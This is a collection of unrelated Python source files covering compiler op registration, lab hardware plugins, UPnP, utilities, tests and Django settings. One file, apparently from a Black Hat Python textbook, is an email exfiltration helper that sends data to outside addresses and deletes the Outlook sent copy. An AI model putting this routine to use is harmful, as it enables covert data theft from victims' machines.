] | null | null | null |
#pylint: disable=invalid-name, unused-argument
"""Backend compiler related feature registration"""
import topi
from topi.util import get_const_int, get_const_tuple
from .. import op as reg
from ..op import OpPattern, schedule_injective
# relu
reg.register_schedule("nn.relu", schedule_injective)
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
@reg.register_schedule("nn.softmax")
def schedule_softmax(_, outputs, target):
"""Schedule definition of softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
schedule_broadcast = schedule_injective
@reg.register_schedule("nn.log_softmax")
def schedule_log_softmax(_, outputs, target):
"""Schedule definition of log_softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
# dense
@reg.register_compute("nn.dense")
def compute_dense(attrs, inputs, out_type, target):
"""Compute definition of dense"""
return [topi.nn.dense(inputs[0], inputs[1])]
@reg.register_schedule("nn.dense")
def schedule_dense(attrs, outputs, target):
"""Schedule definition of dense"""
with target:
return topi.generic.schedule_dense(outputs)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
@reg.register_compute("nn.conv2d")
def compute_conv2d(attrs, inputs, out_type, target):
"""Compute definition of conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
weight_layout = attrs.weight_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if (out_dtype == "same" or out_dtype == "")
else out_dtype)
assert layout in ["NCHW", "NHWC", "NCHW4c"]
(dilation_h, dilation_w) = dilation
if dilation_h < 1 or dilation_w < 1:
raise ValueError("dilation should be positive value")
if groups == 1:
out = topi.nn.conv2d(
inputs[0], inputs[1], strides, padding,
dilation, layout, out_dtype=out_dtype)
elif layout == "NCHW" and \
weight_layout == "OIHW" and \
get_const_int(inputs[1].shape[0]) == groups and \
get_const_int(inputs[1].shape[1]) == 1:
out = topi.nn.depthwise_conv2d_nchw(
inputs[0], inputs[1], strides, padding, dilation, out_dtype=out_dtype)
elif layout == "NHWC" and \
kernel_layout == "HWOI" and\
get_const_int(inputs[1].shape[2]) == groups and \
get_const_int(inputs[1].shape[3]) == 1:
out = topi.nn.depthwise_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, dilation, out_dtype=out_dtype)
else:
raise ValueError("not support arbitrary group number for now")
return [out]
@reg.register_schedule("nn.conv2d")
def schedule_conv2d(attrs, outs, target):
"""Schedule definition of conv2d"""
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.weight_layout
with target:
if groups == 1 and layout == "NCHW":
return topi.generic.schedule_conv2d_nchw(outs)
elif groups == 1 and layout == "NCHW4c":
return topi.generic.schedule_conv2d_nchw(outs)
elif groups == 1 and layout == "NHWC":
return topi.generic.schedule_conv2d_nhwc(outs)
elif groups != 1:
if layout == "NCHW":
# TODO(leyuan, merrymercy, Huyuwei): fold depthwise topi into conv2d.
return topi.generic.schedule_depthwise_conv2d_nchw(outs)
elif layout == "NHWC" and kernel_layout == "HWOI":
return topi.generic.schedule_depthwise_conv2d_nhwc(outs)
raise ValueError("No compatible schedule")
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d_transpose
@reg.register_compute("nn.conv2d_transpose")
def compute_conv2d_transpose(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if (out_dtype == "same" or out_dtype == "")
else out_dtype)
assert layout == "NCHW", "only support nchw for now"
assert dilation == (1, 1), "not support dilate now"
assert groups == 1, "only support groups == 1 for now"
out = topi.nn.conv2d_transpose_nchw(inputs[0], inputs[1], strides, padding, out_dtype)
output_padding = get_const_tuple(attrs.output_padding)
out = topi.nn.pad(out,
[0, 0, 0, 0], [0, 0, output_padding[0], output_padding[1]])
return [out]
@reg.register_schedule("nn.conv2d_transpose")
def schedule_conv2d_transpose(attrs, outs, target):
"""Schedule definition of conv2d_transpose"""
with target:
return topi.generic.schedule_conv2d_transpose_nchw(outs)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
@reg.register_compute("nn.bias_add")
def compute_bias_add(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
axis = attrs.axis
bias = inputs[1]
data_ndim = len(inputs[0].shape)
if axis < 0:
axis = axis + data_ndim
num_newaxis = data_ndim - axis - 1
if num_newaxis:
bias = topi.expand_dims(bias, axis=1, num_newaxis=num_newaxis)
return [topi.add(inputs[0], bias)]
reg.register_schedule("nn.bias_add", schedule_injective)
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool2d
@reg.register_schedule("nn.max_pool2d")
def schedule_max_pool2d(attrs, outs, target):
"""Schedule definition of max_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
@reg.register_schedule("nn.avg_pool2d")
def schedule_avg_pool2d(attrs, outs, target):
"""Schedule definition of avg_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
@reg.register_schedule("nn.global_max_pool2d")
def schedule_global_max_pool2d(_, outs, target):
"""Schedule definition of global_max_pool2d"""
with target:
return topi.generic.schedule_global_pool(outs)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
@reg.register_schedule("nn.global_avg_pool2d")
def schedule_global_avg_pool2d(_, outs, target):
"""Schedule definition of global_avg_pool2d"""
with target:
return topi.generic.schedule_global_pool(outs)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_schedule("nn.leaky_relu", schedule_broadcast)
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_schedule("nn.prelu", schedule_broadcast)
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_schedule("nn.batch_flatten", schedule_broadcast)
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype, target):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis,
attrs.alpha, attrs.beta, attrs.bias)]
@reg.register_schedule("nn.lrn")
def schedule_lrn(attrs, outs, target):
"""Schedule definition of lrn"""
with target:
return topi.generic.schedule_lrn(outs)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# l2_normalize
@reg.register_compute("nn.l2_normalize")
def compute_l2_normalize(attrs, inputs, out_dtype, target):
"""Compute definition of l2 normalize"""
return [topi.nn.l2_normalize(inputs[0], attrs.eps, attrs.axis)]
@reg.register_schedule("nn.l2_normalize")
def schedule_l2_normalize(attrs, outs, target):
"""Schedule definition of l2 normalize"""
with target:
return topi.generic.schedule_l2_normalize(outs)
reg.register_pattern("nn.l2_normalize", OpPattern.OUT_ELEMWISE_FUSABLE)
| 34.748971
| 90
| 0.709261
|
6c1733f0e97a75b2c4bbfcf1320a69ab3b513f2e
| 959
|
py
|
Python
|
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | 1
|
2021-12-14T07:05:49.000Z
|
2021-12-14T07:05:49.000Z
|
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | null | null | null |
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | 1
|
2021-06-12T12:25:52.000Z
|
2021-06-12T12:25:52.000Z
|
import smtplib
import time
import win32com.client
smtp_server = 'smtp.example.com'
smtp_port = 587
smtp_acct = 'tim@example.com'
smtp_password = 'seKret'
tgt_accts = ['tim@elsewhere.com']
def plain_email(subject, contents):
message = f'Subject: {subject}\nFrom {smtp_acct}\n'
message += f'To: {tgt_accts}\n\n{contents.decode()}'
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
server.login(smtp_acct, smtp_password)
#server.set_debuglevel(1)
server.sendmail(smtp_acct, tgt_accts, message)
time.sleep(1)
server.quit()
def outlook(subject, contents):
outlook = win32com.client.Dispatch("Outlook.Application")
message = outlook.CreateItem(0)
message.DeleteAfterSubmit = True
message.Subject = subject
message.Body = contents.decode()
message.To = 'boodelyboo@boodelyboo.com'
message.Send()
if __name__ == '__main__':
plain_email('test2 message', 'attack at dawn.')
| 28.205882
| 61
| 0.705944
|
15f961d58288b84081aa3687f9f5d743dbb7aa4e
| 10,024
|
py
|
Python
|
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | null | null | null |
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
import os
from envisage.ui.tasks.task_extension import TaskExtension
from envisage.ui.tasks.task_factory import TaskFactory
from pyface.tasks.action.schema import SMenu
from pyface.tasks.action.schema_addition import SchemaAddition
from traits.api import List, Str
from pychron.core.helpers.filetools import glob_list_directory
from pychron.core.helpers.strtools import to_bool
from pychron.envisage.initialization.initialization_parser import InitializationParser
from pychron.envisage.tasks.base_task_plugin import BaseTaskPlugin
from pychron.envisage.tasks.list_actions import PatternAction, ShowMotionConfigureAction
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.lasers.tasks.laser_actions import OpenPowerMapAction, OpenPatternAction, NewPatternAction, \
LaserScriptExecuteAction
# from pychron.lasers.tasks.laser_calibration_task import LaserCalibrationTask
from pychron.paths import paths
def pattern_action(name, application, manager_name, lase=False):
def factory():
a = PatternAction(id='pattern.action.{}'.format(name),
name=name.capitalize(),
application=application,
manager_name=manager_name,
pattern_path=os.path.join(paths.pattern_dir, name),
lase=lase)
return a
return factory
class CoreClientLaserPlugin(BaseTaskPlugin):
pass
class CoreLaserPlugin(BaseTaskPlugin):
def _task_extensions_default(self):
actions = [SchemaAddition(factory=OpenPowerMapAction,
path='MenuBar/file.menu/Open'),
SchemaAddition(id='Open Pattern',
factory=OpenPatternAction,
path='MenuBar/file.menu/Open'),
SchemaAddition(id='New Pattern',
factory=NewPatternAction,
path='MenuBar/file.menu/New')]
return [TaskExtension(actions=actions)]
class BaseLaserPlugin(BaseTaskPlugin):
managers = List(contributes_to='pychron.hardware.managers')
klass = None
mode = None
def _service_offers_default(self):
"""
"""
if self.klass is None:
raise NotImplementedError
so = self.service_offer_factory(protocol=ILaserManager, factory=self._manager_factory)
return [so]
def _manager_factory(self):
"""
"""
ip = InitializationParser()
plugin = ip.get_plugin(self.klass[1].replace('Manager', ''), category='hardware')
mode = ip.get_parameter(plugin, 'mode')
self.mode = mode
klass = ip.get_parameter(plugin, 'klass')
if klass is None and mode == 'client':
klass = 'PychronLaserManager'
pkg = 'pychron.lasers.laser_managers.pychron_laser_manager'
factory = __import__(pkg, fromlist=[klass])
klassfactory = getattr(factory, klass)
else:
factory = __import__(self.klass[0], fromlist=[self.klass[1]])
klassfactory = getattr(factory, self.klass[1])
params = dict(name=self.name)
if mode == 'client':
try:
tag = ip.get_parameter(plugin, 'communications', element=True)
for attr in ['host', 'port', 'kind', 'timeout',
'baudrate',
'parity',
'stopbits',
'message_frame', ('use_end', to_bool)]:
func = None
if isinstance(attr, tuple):
attr, func = attr
try:
elem = tag.find(attr)
if elem is not None:
v = elem.text.strip()
if func:
v = func(v)
params[attr] = v
else:
self.debug('No communications attribute {}'.format(attr))
except Exception as e:
print('client comms fail a', attr, e)
except Exception as e:
print('client comms fail b', e)
m = klassfactory(**params)
m.mode = mode
m.bootstrap()
m.plugin_id = self.id
m.bind_preferences(self.id)
return m
def _managers_default(self):
"""
"""
d = []
if self.klass is not None:
d = [dict(name=self.name,
plugin_name=self.name,
manager=self._get_manager())]
return d
def _get_manager(self):
return self.application.get_service(ILaserManager, 'name=="{}"'.format(self.name))
# def execute_pattern(self, name):
# self._get_manager().execute_pattern(name)
# def _preferences_default(self):
# root = paths.preferences_dir
# path = os.path.join(root, 'preferences.ini')
# if not os.path.isfile(path):
# with open(path, 'w'):
# pass
# return ['file://{}'.format(path)]
def _setup_pattern_extensions(self, exts, actions=None):
if actions is None:
actions = []
lactions = []
for f in glob_list_directory(paths.pattern_dir, extension='.lp', remove_extension=True):
actions.append(SchemaAddition(id='pattern.{}'.format(f),
factory=pattern_action(f, self.application, self.name),
path='MenuBar/laser.menu/patterns.menu'))
lactions.append(SchemaAddition(id='pattern.lase.{}'.format(f),
factory=pattern_action(f, self.application, self.name, lase=True),
path='MenuBar/laser.menu/patterns.lase.menu'))
if actions:
actions.insert(0, SchemaAddition(id='patterns.menu',
factory=lambda: SMenu(name='Execute Patterns', id='patterns.menu'),
path='MenuBar/laser.menu'))
lactions.insert(0, SchemaAddition(id='patterns.lase.menu',
factory=lambda: SMenu(name='Execute and Lase Patterns',
id='patterns.lase.menu'),
path='MenuBar/laser.menu'))
exts.append(TaskExtension(actions=lactions))
exts.append(TaskExtension(actions=actions))
else:
self.warning('no patterns scripts located in "{}"'.format(paths.pattern_dir))
def _create_task_extensions(self):
exts = []
if self.mode != 'client':
def efactory():
return SMenu(id='laser.menu', name='Laser')
actions = [SchemaAddition(id='Laser',
factory=efactory,
path='MenuBar',
before='tools.menu',
after='view.menu')]
exts = [TaskExtension(actions=actions)]
return exts
class FusionsPlugin(BaseLaserPlugin):
task_name = Str
sources = List(contributes_to='pychron.video.sources')
def test_communication(self):
man = self._get_manager()
return man.test_connection()
def _tasks_default(self):
return [TaskFactory(id=self.id,
task_group='hardware',
factory=self._task_factory,
name=self.task_name,
image='laser',
accelerator=self.accelerator),
# TaskFactory(id='pychron.laser.calibration',
# task_group='hardware',
# factory=self._calibration_task_factory,
# name='Laser Calibration',
# accelerator='Ctrl+Shift+2')
]
def _sources_default(self):
ip = InitializationParser()
plugin = ip.get_plugin(self.task_name.replace(' ', ''),
category='hardware')
source = ip.get_parameter(plugin, 'video_source')
rs = []
if source:
rs = [(source, self.task_name)]
return rs
def _task_extensions_default(self):
exts = self._create_task_extensions()
if self.mode != 'client':
actions = [SchemaAddition(factory=ShowMotionConfigureAction,
path='MenuBar/laser.menu'),
SchemaAddition(factory=LaserScriptExecuteAction,
path='MenuBar/laser.menu')]
self._setup_pattern_extensions(exts, actions)
return exts
# ============= EOF =============================================
| 39.003891
| 112
| 0.538109
|
7937043fa47d893b22b424a9d3db3e3364711f63
| 2,573
|
py
|
Python
|
mermer/server/upnp.py
|
sumilying/mermer-chain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | 2
|
2021-11-12T13:32:35.000Z
|
2021-11-16T08:47:28.000Z
|
mermer/server/upnp.py
|
sumilying/mermer-blockchain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | null | null | null |
mermer/server/upnp.py
|
sumilying/mermer-blockchain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | null | null | null |
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "mermer", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run mermer, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
| 34.306667
| 119
| 0.502138
|
3289b5cf6479505fa72a7aeb23fd337785275bf0
| 1,645
|
py
|
Python
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:50:43.000Z
|
2021-04-22T16:12:17.000Z
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:57:49.000Z
|
2021-04-22T22:03:47.000Z
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 1
|
2021-04-22T21:13:00.000Z
|
2021-04-22T21:13:00.000Z
|
def symmetric_difference(list_1: list, list_2: list) -> list:
r"""llogic.symmetric_difference(list_1, list_2)
Returns the symmetric difference of two lists (omitting repetitions). The
order of the elements of the output depends on their order in the lists.
The order of the inputs lists does affect the result. Usage:
>>> alist = [1, 2, 3, 4, 5]
>>> blist = [7, 6, 5, 4, 3]
>>> llogic.symmetric_difference(alist, blist)
[1, 2, 7, 6]
>>> llogic.symmetric_difference(blist, alist)
[7, 6, 1, 2]
>>> alist = [1, 2, 3, 3, 4, 4, 5, 5, 5]
>>> blist = [3, 3, 4, 5, 5, 6]
>>> llogic.symmetric_difference(alist, blist)
[1, 2, 6]
Note that llogic.symmetric_difference does not flatten the lists so nested
lists are of type list:
>>> alist = [3, 4, 1, 5, 2]
>>> blist = [1, 2, 3, 4, 5]
>>> llogic.symmetric_difference(alist, blist)
[]
>>> alist = [3, 4, [1, [5, 2]]]
>>> blist = [1, 2, 3, 4, 5]
>>> llogic.symmetric_difference(alist, blist)
[[1, [5, 2]], 1, 2, 5]
The lists can contain any datatype:
>>> alist = [1, 2.3, 'foo', (3, 7)]
>>> blist = ['foo', 7+3j, (3, 7)]
>>> llogic.symmetric_difference(alist, blist)
[1, 2.3, 7+3j]
"""
if not isinstance(list_1, list):
raise TypeError('\'list_1\' must be \'list\'')
if not isinstance(list_2, list):
raise TypeError('\'list_2\' must be \'list\'')
output_list = []
for item in list_1 + list_2:
if item not in list_1 or item not in list_2:
if item not in output_list:
output_list.append(item)
return output_list
| 33.571429
| 78
| 0.577508
|
29b1de50936b64cd20a03704df67768e7561eea7
| 1,668
|
py
|
Python
|
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_shared_paths.py
|
HirniMeshram/Shapely
|
5c57829f31c227111aa232fe61841e7969c19ca0
|
[
"BSD-3-Clause"
] | null | null | null |
from . import unittest
from shapely.geometry import Point, LineString, Polygon, MultiLineString, \
GeometryCollection
from shapely.geos import geos_version
from shapely.ops import shared_paths
@unittest.skipIf(geos_version < (3, 3, 0), 'GEOS 3.3.0 required')
class SharedPaths(unittest.TestCase):
def test_shared_paths_forward(self):
g1 = LineString([(0, 0), (10, 0), (10, 5), (20, 5)])
g2 = LineString([(5, 0), (15, 0)])
result = shared_paths(g1, g2)
self.assertTrue(isinstance(result, GeometryCollection))
self.assertTrue(len(result) == 2)
a, b = result.geoms
self.assertTrue(isinstance(a, MultiLineString))
self.assertTrue(len(a) == 1)
self.assertEqual(a.geoms[0].coords[:], [(5, 0), (10, 0)])
self.assertTrue(b.is_empty)
def test_shared_paths_forward2(self):
g1 = LineString([(0, 0), (10, 0), (10, 5), (20, 5)])
g2 = LineString([(15, 0), (5, 0)])
result = shared_paths(g1, g2)
self.assertTrue(isinstance(result, GeometryCollection))
self.assertTrue(len(result) == 2)
a, b = result.geoms
self.assertTrue(isinstance(b, MultiLineString))
self.assertTrue(len(b) == 1)
self.assertEqual(b.geoms[0].coords[:], [(5, 0), (10, 0)])
self.assertTrue(a.is_empty)
def test_wrong_type(self):
g1 = Point(0, 0)
g2 = LineString([(5, 0), (15, 0)])
with self.assertRaises(TypeError):
result = shared_paths(g1, g2)
with self.assertRaises(TypeError):
result = shared_paths(g2, g1)
| 37.066667
| 75
| 0.586331
|
94aa6de1a0aa1e1ed5049f88bc45e1d859171e0a
| 3,352
|
py
|
Python
|
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
elam91/django-noob-api
|
3106daa5cb0e1cb634e507862b3bddbb04e0cbe1
|
[
"MIT"
] | null | null | null |
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ble)pldsq=uu^9&e^_(f&ki0q$9!t&qh@^pbn(4=qidr(8vbr+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool(int(os.environ.get('DEBUG', 1)))
ALLOWED_HOSTS = ['ec2-63-33-204-115.eu-west-1.compute.amazonaws.com', '127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.userprofile'
STATIC_ROOT = 'static/'
| 27.47541
| 91
| 0.699284
|
94a6e1e81a9d2817822faac305221950536452d7
| 740
|
py
|
Python
|
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | 14
|
2020-10-15T21:47:18.000Z
|
2021-12-01T06:06:51.000Z
|
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | null | null | null |
MatrixDiagonalSum.py
|
vanigupta20024/Programming-Challenges
|
578dba33e9f6b04052a503bcb5de9b32f33494a5
|
[
"MIT"
] | 4
|
2020-06-15T14:40:45.000Z
|
2021-06-15T06:22:03.000Z
|
'''
Given a square matrix mat, return the sum of the matrix diagonals.
Only include the sum of all the elements on the primary diagonal and all the elements on the secondary diagonal that are not part of the primary diagonal.
n == mat.length == mat[i].length
1 <= n <= 100
1 <= mat[i][j] <= 100
'''
class Solution:
def diagonalSum(self, mat: List[List[int]]) -> int:
i = j = k = 0
l = len(mat) - 1
mat_sum = 0
while i < len(mat):
mat_sum += mat[i][j] + mat[k][l]
if i == k and j == l:
mat_sum -= mat[i][j]
i += 1
j += 1
k += 1
l -= 1
return mat_sum
| 25.517241
| 154
| 0.475676
|
a01862d54b3fb79d0ad18b3daa9c3d00fe2bac8a
| 4,032
|
py
|
Python
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/support/azext_support/_completers.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument
from azure.cli.core.decorators import Completer
languages = ["en-us", "es-es", "fr-fr", "de-de", "it-it", "ja-jp", "ko-kr", "ru-ru", "pt-br", "zh-tw", "zh-hans"]
timezones = ["Afghanistan Standard Time", "Alaskan Standard Time", "Arab Standard Time", "Arabian Standard Time",
"Arabic Standard Time", "Argentina Standard Time", "Atlantic Standard Time", "AUS Central Standard Time",
"AUS Eastern Standard Time", "Azerbaijan Standard Time", "Azores Standard Time",
"Canada Central Standard Time", "Cape Verde Standard Time", "Caucasus Standard Time",
"Cen. Australia Standard Time", "Central America Standard Time", "Central Asia Standard Time",
"Central Brazilian Standard Time", "Central Europe Standard Time", "Central European Standard Time",
"Central Pacific Standard Time", "Central Standard Time", "Central Standard Time (Mexico)",
"China Standard Time", "Dateline Standard Time", "E. Africa Standard Time",
"E. Australia Standard Time", "E. Europe Standard Time", "E. South America Standard Time",
"Eastern Standard Time", "Eastern Standard Time (Mexico)", "Egypt Standard Time",
"Ekaterinburg Standard Time", "Fiji Standard Time", "FLE Standard Time", "Georgian Standard Time",
"GMT Standard Time", "Greenland Standard Time", "Greenwich Standard Time", "GTB Standard Time",
"Hawaiian Standard Time", "India Standard Time", "Iran Standard Time", "Israel Standard Time",
"Jordan Standard Time", "Korea Standard Time", "Mauritius Standard Time",
"Central Standard Time (Mexico)", "Mid-Atlantic Standard Time", "Middle East Standard Time",
"Montevideo Standard Time", "Morocco Standard Time", "Mountain Standard Time",
"Mountain Standard Time (Mexico)", "Myanmar Standard Time", "N. Central Asia Standard Time",
"Namibia Standard Time", "Nepal Standard Time", "New Zealand Standard Time",
